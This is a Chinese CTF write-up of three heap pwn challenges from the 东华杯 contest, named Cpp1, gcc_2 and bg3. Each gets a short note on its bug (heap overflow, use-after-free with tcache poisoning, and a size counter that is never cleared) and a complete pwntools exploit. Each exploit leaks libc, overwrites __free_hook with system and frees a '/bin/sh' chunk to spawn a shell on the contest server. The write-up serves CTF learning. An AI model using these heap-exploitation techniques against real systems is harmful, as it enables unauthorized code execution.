东华杯部分PWN | 桥下少年

Cpp1

edit的时候没有进行size的大小判定，存在堆溢出。利用堆溢出进行overlapping来泄露libc，之后简单的
free__hook写入system，最后释放掉binsh的堆块获取shell

exp：

#coding:utf-8
from pwn import *
from LibcSearcher import *
import time, sys, base64

context.os = 'linux'
context.arch = 'amd64'
# context.arch = 'i386'
context.log_level = 'debug'

# 1 pro
# 2 remote
# 3 127
debug = 1
filename = 'pwn1'

if debug == 1 :
    p = process(filename)
if debug == 2:
    p = remote('47.104.143.202',43359)
if debug == 3:
    p = remote('127.0.0.1',12345)
    #23946

elf = ELF('./pwn1')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

def cmd(index):
    p.sendlineafter('>>',str(index))

def add(index,size):
    cmd(1)
    p.sendlineafter('I:>>',str(index))
    p.sendlineafter('S:>>',str(size))

def edit(index,content):
    cmd(2)
    p.sendlineafter('I:>>',str(index))   
    p.sendlineafter('V:>>',content) 

def show(index):
    cmd(3)
    p.sendlineafter('I:>>',str(index))

def free(index):
    cmd(4)
    p.sendlineafter('I:>>',str(index))

#print(hex(libc.sym['_IO_2_1_stdin_']))


add(0,0x30)
add(1,0x90)
add(2,0x90)
add(3,0x90)
add(4,0x90)
add(5,0x90)
add(6,0x90)

add(7,0x50)

add(8,0x90)


payload = b'a'*0x30 + p64(0)+p64(0x421)
edit(0,payload)
# gdb.attach(p)

free(1)
# gdb.attach(p)
add(9,0x80)

show(9)
p.recvuntil('\n')
# malloc_hook_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00')) - 1104 -0x10
malloc_hook_addr=u64(p.recvline(keepends=False).ljust(8,b'\x00'))-1104-0x10
log.success('malloc_hook_addr: ' + hex(malloc_hook_addr))


libc_base = malloc_hook_addr - libc.sym['__malloc_hook']
fun=libc_base+0x1ebce0
print(hex(fun))



system_addr = libc_base + libc.sym['system']
one = [0xe6c7e,0xe6c81,0xe6c84]
one_gadget = libc_base + one[2]
free_hook=libc_base +libc.sym['__free_hook']

log.success('system_addr: ' + hex(system_addr))
log.success('one_gadget: ' + hex(one_gadget))
add(10,0x80)
free(10)
#free(6)
free(9)
edit(0,b'a'*0x38+p64(0x91)+p64(free_hook))
add(11,0x80)
edit(11,'/bin/sh\x00')
add(12,0x80)
edit(12,p64(system_addr))
gdb.attach(p)
#add(13,0x20)
free(11)
#gdb.attach(p)
p.interactive()

gcc_2

cpp1的简单升级版，堆溢出变为uaf。利用uaf将fd指向tcache管理结构，申请到tcache结构，将对应的tcache的堆块对应的counts填充为7，然后释放掉该堆块，获得libc地址，之后将堆块申请到free_hook写入system释放binsh堆块即可

#coding:utf-8
from pwn import *
from LibcSearcher import *
import time, sys, base64

context.os = 'linux'
context.arch = 'amd64'
# context.arch = 'i386'
context.log_level = 'debug'

# 1 pro
# 2 remote
# 3 127
debug = 2
filename = 'pwn2'

if debug == 1 :
    p = process(filename)
if debug == 2:
    p = remote('47.104.143.202',15348)
if debug == 3:
    p = remote('127.0.0.1',12345)
    #23946

elf = ELF('./pwn2')
# libc = ELF.libc
libc = ELF('libc-2.31.so')

def cmd(index):
    p.sendlineafter('>>',str(index))

def add(index,size):
    cmd(1)
    p.sendlineafter('I:>>',str(index))
    p.sendlineafter('S:>>',str(size))

def edit(index,content):
    cmd(2)
    p.sendlineafter('I:>>',str(index))   
    p.sendlineafter('V:>>',content) 

def show(index):
    cmd(3)
    p.sendlineafter('I:>>',str(index))

def free(index):
    cmd(4)
    p.sendlineafter('I:>>',str(index))



main_arena_offset = libc.symbols["__malloc_hook"] + 0x10
add(0,0x67)
add(1,0x67)
add(2,0x67)
edit(0,'a'*0x10)

free(0)
free(1)

show(1)
p.recvuntil('\n')
heap_base = u64(p.recvline(keepends=False).ljust(8,b'\x00')) - 0x12ec0
log.success('heap_base: ' + hex(heap_base))
edit(1,p64(heap_base+0x10))
add(3,0x67)
#edit(3,'/bin/sh\x00')
add(4,0x67)  #申请到tcache管理堆块
#free(4)
edit(4,p64(0)*9+p64(0x0007000000000000))
free(4)
show(4)
p.recvuntil('\n')
base = u64(p.recvline(keepends=False).ljust(8,b'\x00'))-96-main_arena_offset
print(hex(base))
free_hook=base +libc.sym['__free_hook']
sys=base+libc.sym['system']
malloc_hook=base +libc.sym['__malloc_hook']
edit(4,p64(0x0000000000000000)*2)
free(1)
free(2)
edit(2,p64(free_hook))
add(5,0x67)
edit(5,'/bin/sh\x00')
add(6,0x67)
edit(6,p64(sys))
gdb.attach(p)
free(5)

bg3

个人觉得这是三题里面最简单的，在del里面删除后，没有对存放size的全局变量清零，导致size叠加，即会造成人为堆溢出。然后大致同第一题

#coding:utf-8
from pwn import *
from LibcSearcher import *
import time, sys, base64

context.os = 'linux'
context.arch = 'amd64'
# context.arch = 'i386'
context.log_level = 'debug'

# 1 pro
# 2 remote
# 3 127
debug = 1
filename = 'pwn3'

if debug == 1 :
    p = process(filename)
if debug == 2:
    p = remote('47.104.143.202',25997)
if debug == 3:
    p = remote('127.0.0.1',12345)
    #23946

elf = ELF('./pwn3')
# libc = ELF.libc
libc = ELF('libc-2.31.so')

def cmd(index):
    p.sendlineafter('Select:',str(index))

def add(index,size):
    cmd(1)
    p.sendlineafter('Index:',str(index))
    p.sendlineafter('PayloadLength:',str(size))

def edit(index,content):
    cmd(2)
    p.sendlineafter('Index:',str(index))   
    p.sendlineafter('BugInfo:',content) 

def show(index):
    cmd(3)
    p.sendlineafter('Index:',str(index))

def free(index):
    cmd(4)
    p.sendlineafter('Index:',str(index))

add(0,0x20)
add(1,0x410)
add(2,0x20)
#gdb.attach(p)
edit(0,'a'*0x10)
free(0)
free(1)
add(1,0x410)
show(1)
#free(0)
main_arena_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00')) - 96
log.success('main_arena_addr: ' + hex(main_arena_addr))
main_arena_offset = libc.symbols["__malloc_hook"] + 0x10
base =main_arena_addr-main_arena_offset
print(hex(base))
free_hook=base+libc.sym['__free_hook']
sys=base + libc.sym['system']
free(1)
#add(3,0x7fffffff)
add(1,0x10)
#edit(1,'b'*0x30)
add(5,0x3f0)
add(6,0x3f0)
free(6)
free(5)
edit(1,p64(0)*3+p64(0x401)+p64(free_hook))
add(7,0x3f0)
edit(7,'/bin/sh\x00')
add(8,0x3f0)
edit(8,p64(sys))
free(7)
p.interactive()